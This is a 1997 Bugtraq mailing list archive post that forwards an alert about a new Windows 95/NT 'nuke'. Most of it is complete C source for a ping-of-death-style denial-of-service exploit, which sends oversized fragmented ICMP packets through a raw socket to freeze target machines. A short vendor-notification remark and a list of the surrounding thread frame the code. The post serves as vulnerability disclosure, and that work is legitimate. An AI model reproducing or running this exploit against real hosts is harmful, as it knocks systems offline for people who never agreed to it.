Bugtraq mailing list archives
[ALERT] Another nuke.
From: aleph1 () DFW NET (Aleph One)
Date: Sun, 29 Jun 1997 04:59:01 -0500
---------- Forwarded message ---------- Date: Sun, 29 Jun 1997 00:02:21 -0700 From: Jiva DeVoe <jiva () devware com> To: ntsecurity () iss net Subject: [NTSEC] [ALERT] Another nuke. -----BEGIN PGP SIGNED MESSAGE----- I haven't seen this topic up yet, so, here it comes: The following program has been plaguing us. It's a variation on the large ping bug found some months ago. Does not blue screen, instead locks up Win95 and WinNT machines hard. If this is already known, my apologies. Yes, MS has been notified. o / o / - -------- X snip here X----------------------------------------------- o \ o \ #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <winsock2.h> /* * If your kernel doesn't muck with raw packets, #define REALLY_RAW. * This is probably only Linux. */ #ifdef REALLY_RAW #define FIX(x) htons(x) #else #define FIX(x) (x) #endif int main(int argc, char **argv) { int s; char buf[1500]; struct ip *ip = (struct ip *)buf; struct icmp *icmp = (struct icmp *)(ip + 1); struct hostent *hp; struct sockaddr_in dst; int offset; int on = 1; bzero(buf, sizeof buf); if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) { perror("socket"); exit(1); } if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) { perror("IP_HDRINCL"); exit(1); } if (argc != 2) { fprintf(stderr, "usage: %s hostname\n", argv[0]); exit(1); } if ((hp = gethostbyname(argv[1])) == NULL) { if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) { fprintf(stderr, "%s: unknown host\n", argv[1]); } } else { bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length); } printf("Sending to %s\n", inet_ntoa(ip->ip_dst)); ip->ip_v = 4; ip->ip_hl = sizeof *ip >> 2; ip->ip_tos = 0; ip->ip_len = FIX(sizeof buf); ip->ip_id = htons(4321); ip->ip_off = FIX(0); ip->ip_ttl = 255; ip->ip_p = 1; ip->ip_sum = 0; /* kernel fills in */ ip->ip_src.s_addr = 0; /* kernel fills in */ dst.sin_addr = ip->ip_dst; dst.sin_family = AF_INET; icmp->icmp_type = ICMP_ECHO; icmp->icmp_code = 0; icmp->icmp_cksum = htons(~(ICMP_ECHO << 8)); /* the checksum of all 0's is easy to compute */ for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) { ip->ip_off = FIX(offset >> 3); if (offset < 65120) ip->ip_off |= FIX(IP_MF); else ip->ip_len = FIX(418); /* make total 65538 */ if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst, sizeof dst) < 0) { fprintf(stderr, "offset %d: ", offset); perror("sendto"); } if (offset == 0) { icmp->icmp_type = 0; icmp->icmp_code = 0; icmp->icmp_cksum = 0; } } } -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBM7YIdKsbArBQb5xNAQEM2AP+MREUWOFpKhB/u5+fVAQ3qt7SrZPVEPE2 JLMnOFoF/2CETDY9+tKBxcp0ilM4SrSwYv/zROGVZONrmS00Xlh8gIOwpGFU9dNj QEHPbq7xTE9Cb4DjPR0uxpWUEd5fixbdfI3B4Qiih/lG+KA8i8PjNVIha2FLEeNz qMv6a/mcaPs= =pRms -----END PGP SIGNATURE-----
Current thread:
- Re: Solaris Ping bug (DoS) Jes Sorensen (Jun 26)
- Re: Solaris Ping bug (DoS) Kevin M Lynn (Jun 26)
- <Possible follow-ups>
- Re: Solaris Ping bug (DoS) Will Kempf (Jun 27)
- Re: Solaris Ping bug (DoS) Philip Kizer (Jun 27)
- smbmount buffer overflow Gerald Britton (Jun 27)
- Solaris Ping DOS - Best solution? Anton T. Rager (Jun 27)
- Re: smbmount buffer overflow Volker.Lendecke (Jun 28)
- BIND/iX updated to 8.1.1-REL production release Aleph One (Jun 28)
- ping exploit fATE 1997 BABY (Jun 28)
- sping binary fATE 1997 BABY (Jun 28)
- [ALERT] Another nuke. Aleph One (Jun 29)
- Re: [ALERT] Another nuke. Brian Mitchell (Jun 29)
- Re: Another nuke. Bob Tinsley (Jun 30)